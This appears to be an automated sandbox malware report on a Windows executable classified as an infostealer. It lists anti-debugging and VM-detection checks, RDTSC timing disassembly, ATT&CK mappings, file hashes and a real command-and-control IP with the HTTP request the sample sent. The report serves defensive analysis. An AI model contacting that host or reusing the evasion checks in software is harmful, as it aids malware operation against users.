Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10E59 second address: 4A10ECB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F79113F079Bh 0x00000009 sbb cx, 11BEh 0x0000000e jmp 00007F79113F07A9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F79113F07A0h 0x0000001a sub al, FFFFFFB8h 0x0000001d jmp 00007F79113F079Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 mov eax, dword ptr [ebp-14h] 0x00000029 jmp 00007F79113F07A6h 0x0000002e mov ecx, esi 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10ECB second address: 4A10ECF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10ECF second address: 4A10ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10ED5 second address: 4A10EDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10EDB second address: 4A10EDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10EDF second address: 4A10F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+0Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e movsx edi, ax 0x00000011 jmp 00007F79111F4F00h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10F01 second address: 4A10F97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F79113F07A1h 0x00000009 sub si, C016h 0x0000000e jmp 00007F79113F07A1h 0x00000013 popfd 0x00000014 mov ecx, 5BDF2A87h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov edx, 74E806ECh 0x00000021 pushad 0x00000022 mov si, E37Fh 0x00000026 pushfd 0x00000027 jmp 00007F79113F07A4h 0x0000002c and al, 00000068h 0x0000002f jmp 00007F79113F079Bh 0x00000034 popfd 0x00000035 popad 0x00000036 sub eax, eax 0x00000038 pushad 0x00000039 call 00007F79113F07A5h 0x0000003e mov cx, 3647h 0x00000042 pop eax 0x00000043 push eax 0x00000044 push edx 0x00000045 call 00007F79113F07A3h 0x0000004a pop esi 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10F97 second address: 4A10FE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4F09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a lock cmpxchg dword ptr [edx], ecx 0x0000000e pushad 0x0000000f push eax 0x00000010 mov ah, dl 0x00000012 pop ecx 0x00000013 mov dl, 72h 0x00000015 popad 0x00000016 pop edi 0x00000017 jmp 00007F79111F4EFCh 0x0000001c test eax, eax 0x0000001e pushad 0x0000001f mov eax, 11CB1BCDh 0x00000024 mov ch, A7h 0x00000026 popad 0x00000027 jne 00007F79815E35F9h 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10FE5 second address: 4A10FEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10FEB second address: 4A10FF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10FF1 second address: 4A1101A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c mov ebx, 0B080230h 0x00000011 mov ebx, 3823115Ch 0x00000016 popad 0x00000017 mov eax, dword ptr [esi] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F79113F079Eh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A1101A second address: 4A11020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 473C30 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 64C65F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 6B3CA7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00706806 rdtsc 0_2_00706806
Source: C:\Users\user\Desktop\file.exe | Window / User API: threadDelayed 1883
Source: C:\Users\user\Desktop\file.exe | Window / User API: threadDelayed 1695
Source: C:\Users\user\Desktop\file.exe | API coverage: 4.7 %
Source: C:\Users\user\Desktop\file.exe TID: 928 | Thread sleep count: 55 > 30
Source: C:\Users\user\Desktop\file.exe TID: 928 | Thread sleep time: -110055s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 4564 | Thread sleep count: 70 > 30
Source: C:\Users\user\Desktop\file.exe TID: 4564 | Thread sleep time: -140070s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 4956 | Thread sleep count: 96 > 30
Source: C:\Users\user\Desktop\file.exe TID: 4956 | Thread sleep count: 115 > 30
Source: C:\Users\user\Desktop\file.exe TID: 4956 | Thread sleep count: 137 > 30
Source: C:\Users\user\Desktop\file.exe TID: 4956 | Thread sleep count: 144 > 30
Source: C:\Users\user\Desktop\file.exe TID: 1216 | Thread sleep count: 1883 > 30
Source: C:\Users\user\Desktop\file.exe TID: 1216 | Thread sleep time: -3767883s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 5800 | Thread sleep count: 1695 > 30
Source: C:\Users\user\Desktop\file.exe TID: 5800 | Thread sleep time: -3391695s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 4956 | Thread sleep count: 204 > 30
Source: C:\Users\user\Desktop\file.exe TID: 4956 | Thread sleep count: 88 > 30
Source: C:\Users\user\Desktop\file.exe TID: 4956 | Thread sleep count: 98 > 30
Source: C:\Users\user\Desktop\file.exe TID: 4956 | Thread sleep count: 92 > 30
Source: C:\Users\user\Desktop\file.exe TID: 4956 | Thread sleep count: 84 > 30
Source: C:\Users\user\Desktop\file.exe TID: 416 | Thread sleep count: 76 > 30
Source: C:\Users\user\Desktop\file.exe TID: 416 | Thread sleep time: -152076s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 5752 | Thread sleep count: 63 > 30
Source: C:\Users\user\Desktop\file.exe TID: 5752 | Thread sleep time: -126063s >= -30000s
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: file.exe, file.exe, 00000000.00000002.4100040646.0000000000603000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.4100666631.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWX
Source: file.exe, 00000000.00000002.4100666631.0000000000C78000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.4100040646.0000000000603000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Process Stats: CPU usage > 42% for more than 60s
Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00706806 rdtsc 0_2_00706806
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0040CDE3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 0_2_00402A50
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_047A7D41 push dword ptr fs:[00000030h] 0_2_047A7D41
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04950D90 mov eax, dword ptr fs:[00000030h] 0_2_04950D90
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0495092B mov eax, dword ptr fs:[00000030h] 0_2_0495092B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00418592 GetProcessHeap, 0_2_00418592
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00409A2A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00409A2A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0040CDE3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040A58A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0040A58A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040A720 SetUnhandledExceptionFilter, 0_2_0040A720
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04959C91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_04959C91
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0495A7F1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0495A7F1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0495D04A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0495D04A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0495A987 SetUnhandledExceptionFilter, 0_2_0495A987
Source: file.exe, file.exe, 00000000.00000002.4100040646.0000000000603000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: &Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040A2EC cpuid 0_2_0040A2EC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00410822 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 0_2_00410822

                Stealing of Sensitive Information

Source: Yara match | File source: 0.3.file.exe.4a40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4950e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1656980225.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 3 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Process Injection | 341 Virtualization/Sandbox Evasion | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 771 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 341 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 4 Obfuscated Files or Information | NTDS | 3 Process Discovery | Distributed Component Object Model | Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 213 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
Source | Detection | Scanner | Label
file.exe | 32% | ReversingLabs | Win32.Infostealer.Tinba
file.exe | 100% | Joe Sandbox ML
No Antivirus matches
Source | Detection | Scanner | Label
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubPj | 100% | Avira URL Cloud | malware
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubPj | file.exe, 00000000.00000002.4100666631.0000000000C67000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.156.72.65 | unknown | Russian Federation | 44636 | ITDELUXE-ASRU | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1565665
Start date and time: 2024-11-30 13:50:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 1s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• VT rate limit hit for: file.exe
Time | Type | Description
07:51:25 | API Interceptor | 10787082x Sleep call for process: file.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.156.72.65 | file.exe | malicious | Nymaim | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
185.156.72.65 | file.exe | malicious | Nymaim | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
185.156.72.65 | file.exe | malicious | Amadey, Nymaim | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
185.156.72.65 | file.exe | malicious | Nymaim | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
185.156.72.65 | file.exe | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
185.156.72.65 | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc | 185.156.72.65/soft/download
185.156.72.65 | file.exe | malicious | Nymaim | 185.156.72.65/soft/download
185.156.72.65 | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.156.72.65/files/download
185.156.72.65 | file.exe | malicious | Nymaim | 185.156.72.65/soft/download
185.156.72.65 | file.exe | malicious | Nymaim | 185.156.72.65/soft/download
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ITDELUXE-ASRU | file.exe | malicious | Nymaim | 185.156.72.65
ITDELUXE-ASRU | file.exe | malicious | Nymaim | 185.156.72.65
ITDELUXE-ASRU | file.exe | malicious | Amadey, Nymaim | 185.156.72.65
ITDELUXE-ASRU | file.exe | malicious | Nymaim | 185.156.72.65
ITDELUXE-ASRU | file.exe | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar | 185.156.72.65
ITDELUXE-ASRU | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc | 185.156.72.65
ITDELUXE-ASRU | file.exe | malicious | Nymaim | 185.156.72.65
ITDELUXE-ASRU | file.exe | malicious | Nymaim | 185.156.72.65
ITDELUXE-ASRU | file.exe | malicious | Nymaim | 185.156.72.65
ITDELUXE-ASRU | file.exe | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim, Xmrig | 185.156.72.65
                  No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.948955755292811
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 2'029'568 bytes
MD5: c54023b84d77e5ce72a48eda24bbc227
SHA1: 21c893f54354a48114c3d36e938f69f7d7f32430
SHA256: e2cee0f3aa497ae6990b9ff45110eaf89a95b31e34383ef8c655bf1a12544d43
SHA512: ad9d8a1df60fb4a3fbd4a1f3f16544eb41c59b642d9b81e00c50f0d3f4cc12b22fe07b70cefbaaa8bf02d076eb9039fbdac41e9cf2b73137e013ea9615b10bab
SSDEEP: 24576:o8iiAa6PY9XMdXUFDbtM950HXWEcSouzyL34WTqfy+J4HQQS2alBekOJ0QqNRz7v:o8YwSdQouHXhcBr4AsUPegJTCz
TLSH: 279533EF0733F7B1D648D4F6C1ADE01E7114297A5B894753D5A46FA00ABF2D31882AB8
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........RC..<...<...<.......<.......<.......<..~G...<...=.3.<.......<.......<.......<.Rich..<.........PE..L....[.d.................|.
Icon Hash: cfa99b8a8651798d
Entrypoint: 0x8c4000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x64C65B18 [Sun Jul 30 12:44:08 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Instruction: jmp 00007F7910887E4Ah
Programming Language:
• [C++] VS2008 build 21022
• [ASM] VS2008 build 21022
• [ C ] VS2008 build 21022
• [IMP] VS2005 build 50727
• [RES] VS2008 build 21022
• [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6f05b | 0x6f | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x66000 | 0x8234 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x4bedbc | 0x18 | cippurft
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                   | 0x1000 | 0x65000 | 0x3ae00 | e0997b2adf8811fdfd04bb86ea98314b | False | 0.9953100119426752 | data | 7.9437280014334295 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc | 0x66000 | 0x8234 | 0x3c00 | 6c7468eca8cf398f19d1b5cbc986ecad | False | 0.926171875 | data | 7.716426009400757 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .idata | 0x6f000 | 0x1000 | 0x200 | 6eb091ff88873fe4d3f846082d82dda4 | False | 0.154296875 | data | 1.0965193819233 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                   | 0x70000 | 0x2a5000 | 0x200 | ce54b6444357e67d5ba43f6f78b8e676 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  cippurft | 0x315000 | 0x1ae000 | 0x1ad400 | 11d34aa0c784965a37aa1c71500614be | False | 0.9926368211269656 | data | 7.950859026244158 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  vcdmathy | 0x4c3000 | 0x1000 | 0x400 | 3dca0fb7d06cf1a3c521fa0b826a0692 | False | 0.7587890625 | data | 6.008400388235224 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .taggant | 0x4c4000 | 0x3000 | 0x2200 | 5005f9ff2ed1ad6d699276831a85fbfb | False | 0.06744025735294118 | DOS executable (COM) | 0.7981887477055756 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                  RT_CURSOR | 0x66460 | 0xea8 | data | | | 1.0029317697228144
                  RT_CURSOR | 0x67308 | 0x8a8 | data | | | 1.0049638989169676
                  RT_CURSOR | 0x67bb0 | 0x568 | data | | | 1.0079479768786128
                  RT_CURSOR | 0x68118 | 0xea8 | data | | | 1.0029317697228144
                  RT_CURSOR | 0x68fc0 | 0x8a8 | data | | | 1.0049638989169676
                  RT_CURSOR | 0x69868 | 0x568 | data | | | 0.5206521739130435
                  RT_ICON | 0x4bee1c | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | India | 0.7557603686635944
                  RT_ICON | 0x4bee1c | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | Sri Lanka | 0.7557603686635944
                  RT_ICON | 0x4bf4e4 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Tamil | India | 0.6829875518672199
                  RT_ICON | 0x4bf4e4 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Tamil | Sri Lanka | 0.6829875518672199
                  RT_ICON | 0x4c1a8c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Tamil | India | 0.8058510638297872
                  RT_ICON | 0x4c1a8c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Tamil | Sri Lanka | 0.8058510638297872
                  RT_STRING | 0x6cea8 | 0x252 | empty | Tamil | India | 0
                  RT_STRING | 0x6cea8 | 0x252 | empty | Tamil | Sri Lanka | 0
                  RT_STRING | 0x6d0fc | 0x396 | empty | Tamil | India | 0
                  RT_STRING | 0x6d0fc | 0x396 | empty | Tamil | Sri Lanka | 0
                  RT_STRING | 0x6d494 | 0x520 | empty | Tamil | India | 0
                  RT_STRING | 0x6d494 | 0x520 | empty | Tamil | Sri Lanka | 0
                  RT_STRING | 0x6d9b4 | 0x3ee | empty | Tamil | India | 0
                  RT_STRING | 0x6d9b4 | 0x3ee | empty | Tamil | Sri Lanka | 0
                  RT_ACCELERATOR | 0x6dda4 | 0x58 | empty | Tamil | India | 0
                  RT_ACCELERATOR | 0x6dda4 | 0x58 | empty | Tamil | Sri Lanka | 0
                  RT_GROUP_CURSOR | 0x6ddfc | 0x30 | empty | | | 0
                  RT_GROUP_CURSOR | 0x6de2c | 0x30 | empty | | | 0
                  RT_GROUP_ICON | 0x4c1ef4 | 0x30 | data | Tamil | India | 0.9375
                  RT_GROUP_ICON | 0x4c1ef4 | 0x30 | data | Tamil | Sri Lanka | 0.9375
                  RT_VERSION | 0x4c1f24 | 0x254 | data | | | 0.5436241610738255
                  RT_MANIFEST | 0x4c2178 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
                  DLL | Import
                  kernel32.dll | lstrcpy
                  Language of compilation system | Country where language is spoken
                  Tamil | India
                  Tamil | Sri Lanka
                  • 185.156.72.65
                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  0 | 192.168.2.4 | 49730 | 185.156.72.65 | 80 | 5796 | C:\Users\user\Desktop\file.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Nov 30, 2024 13:50:58.982016087 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
